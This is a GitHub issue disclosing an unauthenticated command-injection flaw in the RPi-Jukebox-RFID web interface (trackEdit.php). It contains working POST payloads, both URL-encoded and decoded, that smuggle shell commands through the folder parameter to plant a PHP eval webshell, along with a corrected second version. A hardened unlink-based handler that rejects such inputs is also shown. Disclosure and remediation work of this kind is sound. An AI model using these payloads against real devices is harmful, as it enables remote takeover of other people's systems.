MiczFlor / RPi-Jukebox-RFID

A Raspberry Pi jukebox, playing local music, podcasts, web radio and streams triggered by RFID cards, web app or home automation. All plug and play via USB. GPIO scripts available.
http://phoniebox.de
MIT License

🐛 | RPi-Jukebox-RFID V2.7_RCE_5 #2400

Open xjzzzxx opened 3 months ago

xjzzzxx commented 3 months ago

Version

v2.7.0

Branch

released

OS

ubuntu 22

Pi model

unknown

Hardware

No response

What happened?

Hello,

I would like to report an RCE vulnerability in RPi-Jukebox-RFID v2.7 (no permissions required).

Analysis

The path of the vulnerability: htdocs\trackEdit.php

if($_POST['ACTION'] == "trackDelete") {     // Line 232 (CheckPoint)
    if($_POST['deleteTrack'] == "yes") {    // Line 233 (CheckPoint)
        $exec = 'sudo rm "'.$post['folder'].'/'.$post['filename'].'"'; // Line 235 (Source)
        exec($exec);    // Line 236 (Sink)
    }
}

Source from Line 235 ($_POST['folder'] and $_POST['filename']).

And then there are two checkpoints (Line 232 and Line 233), which we bypass by setting $_POST['ACTION'] = trackDelete and $_POST['deleteTrack'] = yes.

After bypassing the two checkpoints, the tainted source passes to $exec and exec($exec) (Line 236) without any further check.

PoC

POST /htdocs/trackEdit.php

Data:

ACTION=trackDelete&deleteTrack=yes&folder=hello%22+%3b+echo+%22%3c%3fphp+%40eval(%24_POST%5b%27pass%27%5d)+%3f%3e%22++%3e+.%2fshell5.php+%3b&filename=1%22

Here is the version without URL encoding for ease of understanding:

ACTION=trackDelete&deleteTrack=yes&folder=hello" ; echo "<?php @eval($_POST['pass']) ?>" > ./shell5.php ;&filename=1"

Manual verification

[screenshots]

The attacker can then easily connect to this webshell (/htdocs/shell5.php).

Logs

No response

Configuration

No response

More info

No response
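A hardened version of the trackDelete handler, added here as an example and not taken from the project: it keeps the two checkpoints from the report, drops the shell entirely, verifies that the requested file resolves to a regular file inside an assumed library root ($audioRoot is a name chosen for this example; the real project's path differs), and removes it with unlink(). The three calls at the end feed it a folder containing shell metacharacters, a path-traversal attempt, and a legitimate track; only the last one succeeds.

```php
<?php
// Added example, not the project's code: a hardened trackDelete handler.
// $audioRoot is an assumed library root; the real project's path differs.
declare(strict_types=1);

// Resolve folder/filename against $audioRoot and return the canonical path,
// or null if the request points anywhere other than a regular file inside it.
function resolveTrackPath(string $audioRoot, string $folder, string $filename): ?string
{
    // The track name must be a single path component: no separators, no "." or "..".
    if ($filename === '' || $filename === '.' || $filename === '..'
        || strpbrk($filename, "/\\\0") !== false) {
        return null;
    }
    $root = realpath($audioRoot);
    $dir  = realpath($audioRoot . '/' . $folder);   // collapses ../ and symlinks; false if missing
    if ($root === false || $dir === false) {
        return null;
    }
    // Containment: the resolved folder must be the root itself or sit below it.
    if ($dir !== $root && strncmp($dir, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;
    }
    $path = $dir . DIRECTORY_SEPARATOR . $filename;
    return is_file($path) ? $path : null;
}

// Same two checkpoints as the original, then unlink() instead of exec('sudo rm ...').
function deleteTrack(string $audioRoot, array $post): bool
{
    if (($post['ACTION'] ?? '') !== 'trackDelete' || ($post['deleteTrack'] ?? '') !== 'yes') {
        return false;
    }
    $path = resolveTrackPath($audioRoot, (string)($post['folder'] ?? ''), (string)($post['filename'] ?? ''));
    return $path !== null && unlink($path);
}

// Constructed demo library in a temporary directory.
$audioRoot = sys_get_temp_dir() . '/phoniebox-demo-' . bin2hex(random_bytes(4));
mkdir("$audioRoot/album", 0700, true);
touch("$audioRoot/album/song.mp3");

$base = ['ACTION' => 'trackDelete', 'deleteTrack' => 'yes'];
var_dump(deleteTrack($audioRoot, $base + ['folder' => 'album" ; id ;', 'filename' => '1"']));
var_dump(deleteTrack($audioRoot, $base + ['folder' => '../../..', 'filename' => 'passwd']));
var_dump(deleteTrack($audioRoot, $base + ['folder' => 'album', 'filename' => 'song.mp3']));
```

Because no string ever reaches a shell, quoting tricks in folder or filename have nothing to break out of, and the realpath() containment check also closes the separate path-traversal route that a sudo rm on an attacker-chosen path would leave open.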

xjzzzxx commented 3 months ago

I'm sorry for the issue with the PoC I wrote earlier. I forgot to escape @, which resulted in the generated webshell being unusable. Here is the correct PoC:

PoC_fixed

POST /htdocs/trackEdit.php

Data

ACTION=trackDelete&deleteTrack=yes&folder=hello%22+%3b+echo+%22%3c%3fphp+%40eval(%5c%24_POST%5b%27shell5%27%5d)+%3f%3e%22++%3e+.%2fshell5.php+%3b&filename=1%22

Here is the data without URL encoding for ease of understanding:

ACTION=trackDelete&deleteTrack=yes&folder=hello" ; echo "<?php @eval(\$_POST['shell5']) ?>" > ./shell5.php ;&filename=1"

Manual verification

[screenshots]